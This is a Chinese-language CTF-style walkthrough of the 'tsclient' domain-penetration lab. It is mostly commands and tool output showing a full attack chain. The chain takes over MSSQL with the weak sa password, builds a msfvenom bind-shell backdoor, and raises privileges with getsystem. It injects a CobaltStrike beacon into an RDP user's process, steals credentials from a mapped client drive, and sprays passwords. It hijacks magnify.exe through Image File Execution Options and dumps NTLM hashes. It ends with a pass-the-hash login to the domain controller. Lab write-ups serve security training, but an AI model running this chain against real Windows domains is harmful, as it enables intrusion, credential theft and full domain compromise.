tsclient

春秋云镜域渗透靶场中难度为中等的靶场环境。
该靶场有3个flag,各部分位于不同的机器上。

tag

MSSQLPrivilege ElevationKerberos域渗透RDP

信息搜集

先用fscan扫一下机器
./fscan.exe -h 39.98.113.109

1
2
3
4
5
6
7
start infoscan
39.98.113.109:80 open
39.98.113.109:1433 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.98.113.109      code:200 len:703    title:IIS Windows Server
[+] mssql 39.98.113.109:1433:sa 1qaz!QAZ

机器18

显示MSSQL数据库存在弱口令:用户名为sa,密码为1qaz!QAZ。

1
2
3
4
5
6
7
8
use exploit/windows/mssql/mssql_payload
set payload windows/x64/meterpreter/bind_tcp_uuid
set rhosts 39.98.113.109
set username sa
set password 1qaz!QAZ
set method cmd
set database master
exploit

也可以用mssqlclient连接/usr/bin/impacket-mssqlclient sa:1qaz\!QAZ@39.98.113.109 -port 1433
msf尝试后打不通,改用MDUT成功拿shell,同时可以方便的进行文件上传,这里上传木马后起正向shell
本地生成一个正向shell的windows的64位后门
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5678 -f exe -o xx.exe
然后MDUT上传到目标机器,执行命令
start C:/迅雷下载/xx.exe
配置msf

1
2
3
4
5
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 39.98.113.109
set lport 5678
run

成功获得meterpertre,发现Users里面的Administrator访问不了,需要提权,这里直接使用msf的内置exp提权
getsystem
成功提权
然后

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
type C:\Users\Administrator\flag\flag01.txt
 _________  ________  ________  ___       ___  _______   ________   _________   
|\___   ___\\   ____\|\   ____\|\  \     |\  \|\  ___ \ |\   ___  \|\___   ___\ 
\|___ \  \_\ \  \___|\ \  \___|\ \  \    \ \  \ \   __/|\ \  \\ \  \|___ \  \_| 
     \ \  \ \ \_____  \ \  \    \ \  \    \ \  \ \  \_|/_\ \  \\ \  \   \ \  \  
      \ \  \ \|____|\  \ \  \____\ \  \____\ \  \ \  \_|\ \ \  \\ \  \   \ \  \ 
       \ \__\  ____\_\  \ \_______\ \_______\ \__\ \_______\ \__\\ \__\   \ \__\
        \|__| |\_________\|_______|\|_______|\|__|\|_______|\|__| \|__|    \|__|
              \|_________|                                                      


Getting flag01 is easy, right?

flag01: flag{9fe8ec74-2a5a-4204-8783-ed9524af4dc1}


Maybe you should focus on user sessions...

然后进行fscan扫网段
ipconfig
获得ip为172.22.8.18
C:/迅雷下载/fscan.exe -h 172.22.8.0/24 -o C:/迅雷下载/result.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.8.15     is alive
(icmp) Target 172.22.8.18     is alive
(icmp) Target 172.22.8.46     is alive
(icmp) Target 172.22.8.31     is alive
[*] Icmp alive hosts len is: 4
172.22.8.31:445 open
172.22.8.18:1433 open
172.22.8.46:445 open
172.22.8.15:445 open
172.22.8.18:445 open
172.22.8.31:139 open
172.22.8.46:139 open
172.22.8.31:135 open
172.22.8.15:139 open
172.22.8.18:139 open
172.22.8.46:135 open
172.22.8.15:135 open
172.22.8.18:135 open
172.22.8.46:80 open
172.22.8.18:80 open
172.22.8.15:88 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo 
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
[*] NetBios 172.22.8.15     [+] DC:XIAORANG\DC01           
[*] NetInfo 
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
[*] NetInfo 
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
[*] WebTitle http://172.22.8.18        code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.8.46        code:200 len:703    title:IIS Windows Server
[*] NetBios 172.22.8.31     XIAORANG\WIN19-CLIENT         
[*] NetInfo 
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
   [->]2001:0:348b:fb58:4fb:1e6a:d89d:8e92
[*] NetBios 172.22.8.46     WIN2016.xiaorang.lab                Windows Server 2016 Datacenter 14393
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
已完�?16/16
[*] 扫描结束,耗时: 9.8022057s

搭个代理
C:/xx/windows_x64_agent.exe -l 44444 -s 123
./linux_x64_admin -c 39.98.118.127:44444 -s 123

1
2
use 0
socks 12345

机器46的渗透

这里fscan没扫出来什么洞,试了试iis的漏洞也没啥收获
看一下机器18的进程

1
TCP    172.22.8.18:3389       WIN19-CLIENT:49706     ESTABLISHED

补充:
3389 RDP远程桌面 爆破;Shift后门

想到flag01里面的提示,看一下登录用户会话
这里用query命令查看在线用户发现john用户正通过rdp连接本机

1
2
3
4
5
6
7
8
9
10
11
C:\x>query user
query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 john                  rdp-tcp#0           2  Active       4:41  2025/8/3 19:32

C:\x>query session
query session
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE 
>services                                    0  Disc                        
 console                                     1  Conn                        
 rdp-tcp#0         John                      2  Active

所以这里可以利用CobaltStrike的进程注入功能让john用户上线,连接上后查看进程,找任意一个john的进程进行注入即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
[08/04 00:22:59] beacon> shell net use
[08/04 00:22:59] [*] Tasked beacon to run: net use
[08/04 00:23:01] [+] host called home, sent: 38 bytes
[08/04 00:23:02] [+] received output:
会记录新的网络连接。

状态       本地        远程                      网络

-------------------------------------------------------------------------------
                       \\TSCLIENT\C              Microsoft Terminal Services
命令成功完成。

[08/04 00:23:29] beacon> shell dir \\TSCLIENT\C
[08/04 00:23:29] [*] Tasked beacon to run: dir \\TSCLIENT\C
[08/04 00:23:34] [+] host called home, sent: 47 bytes
[08/04 00:23:37] [+] received output:
 驱动器 \\TSCLIENT\C 中的卷没有标签。
 卷的序列号是 C2C5-9D0C

 \\TSCLIENT\C 的目录

2022/07/12  10:34                71 credential.txt
2022/05/12  17:04    <DIR>          PerfLogs
2022/07/11  12:53    <DIR>          Program Files
2022/05/18  11:30    <DIR>          Program Files (x86)
2022/07/11  12:47    <DIR>          Users
2022/07/11  12:45    <DIR>          Windows
               1 个文件             71 字节
               5 个目录 30,037,176,320 可用字节

[08/04 00:23:39] beacon> shell type \\TSCLIENT\C\credential.txt
[08/04 00:23:39] [*] Tasked beacon to run: type \\TSCLIENT\C\credential.txt
[08/04 00:23:45] [+] host called home, sent: 63 bytes
[08/04 00:23:46] [+] received output:
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

Do you know how to hijack Image?

得到一个域中的用户账号密码以及一个hint
尝试密码喷洒攻击
proxychains -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'
看到STATUS_LPGON_FAILURE,意思是密码已经过期
然后尝试远程登录ip(这里除了机器18的三个都可以尝试但是只有46机器可以成功登录)
proxychains rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p 'Ald@rLMWuy7Z!#'
第一次登录后会让你改密码,然后就远程登录了46机器

机器46的提权

这里成功登录后发现只是低权限用户,考虑提权,前面给了提示映像劫持提权(IFEO劫持)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
PS C:\Users\Aldrich> get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV
                          ersion\Image File Execution Options
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV
                          ersion
PSChildName             : Image File Execution Options
PSDrive                 : HKLM
PSProvider              : Microsoft.PowerShell.Core\Registry
CentralAccessPolicyId   :
CentralAccessPolicyName :
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV
                          ersion\Image File Execution Options
Owner                   : NT AUTHORITY\SYSTEM
Group                   : NT AUTHORITY\SYSTEM
Access                  : {System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.RegistryAcce
                          ssRule, System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.Regis
                          tryAccessRule...}
Sddl                    : O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;CCDCLCSWRPRC;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KR;;;B
                          U)(A;CI;KR;;;AC)
AccessToString          : CREATOR OWNER Allow  FullControl
                          NT AUTHORITY\Authenticated Users Allow  SetValue, CreateSubKey, ReadKey
                          NT AUTHORITY\SYSTEM Allow  FullControl
                          BUILTIN\Administrators Allow  FullControl
                          BUILTIN\Users Allow  ReadKey
                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
AuditToString           :
AccessRightType         : System.Security.AccessControl.RegistryRights
AccessRuleType          : System.Security.AccessControl.RegistryAccessRule
AuditRuleType           : System.Security.AccessControl.RegistryAuditRule
AreAccessRulesProtected : True
AreAuditRulesProtected  : False
AreAccessRulesCanonical : True
AreAuditRulesCanonical  : True

该命令作用:
查看安全权限:
显示哪些用户/组对该注册表项拥有何种权限(如完全控制、读取、写入等)
审核关键注册表项:
Image File Execution Options 是敏感位置(常被恶意软件用于劫持程序执行)

重点在NT AUTHORITY\Authenticated Users 被授予了 SetValueCreateSubKey 权限。这意味着任何登录到系统的普通用户都可以修改此注册表项。可以进行注册表映像劫持,这里劫持锁定界面的放大镜

1
2
PS C:\Users\Aldrich> REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
操作成功完成。

这里提前传msf马方便进行进一步操作,先给msf挂上代理
proxychains msfconsole
本地生成一个正向shell的windows的64位后门
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5678 -f exe -o xx.exe
然后远程桌面上传到目标机器,这里利用rdesktop的-r参数进行共享,将马放在/temp路径下
proxychains rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p 'Ald@rLMWuy7Z!#' -r disk:mydisk="/temp"
然后在对方机器即可看见我们本地路径中的文件,拖入即可
然后我们锁定这台电脑,在右下角点击放大镜,即可弹出这个管理员的命令行窗口
执行命令
start xx.exe
配置msf

1
2
3
4
5
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 172.22.8.46
set lport 5678
run

然后这里就拿到了system的权限,然后就可以去拿flag02.txt了,当然弹出管理员命令行之后就能拿了倒是

机器15的渗透

然后进行下一步渗透,查看域控管理员组

1
2
3
4
5
6
7
net group "domain admins" /domain
这项请求将在域xiaorang.lab的域控制器处理。
组名        Domain Admins
注释        指定的域管理员
成员
----------------------------------
Administrator      WIN2016$

发现win2016$在域管组里,即机器账户可以Hash传递登录域控。
然后用creds_all获取凭证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
meterpreter > creds_all
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain    NTLM                       SHA1                       DPAPI
--------  ------    ----                       ----                       -----
Aldrich   XIAORANG  f833b1285fea0f548d6022081  4c4fdc74b86cde011a14be14c  91ba27d3231a4ac6c9967e267
                    e030e55                    54cb74c5ae3456e            f815d61
WIN2016$  XIAORANG  17b0ca4ae854dc2e5ba037fdb  4be5a0c3c6e3ed6eaa64146e6
                    6ce9524                    d2e317f1dd43534
WIN2016$  XIAORANG  4ba974f170ab0fe1a8a1eb0ed  e06238ecefc14d675f762b08a
                    8f6fe1a                    456770dc000f763
mingzu$   WIN2016   b976ca603387721ba9bed4a7e  9e9770aad669394ed98819c77
                    a1b0103                    f7cfb45c2142b2f

利用wmiexec对WIN2016$的凭证进行利用直接尝试登录域控
proxychains4 /usr/bin/impacket-wmiexec -hashes 00000000000000000000000000000000:17b0ca4ae854dc2e5ba037fdb6ce9524 xiaorang.lab/WIN2016\$@172.22.8.15
然后直接去拿flag03.txt即可

补充

解决中文乱码问题
chcp 65001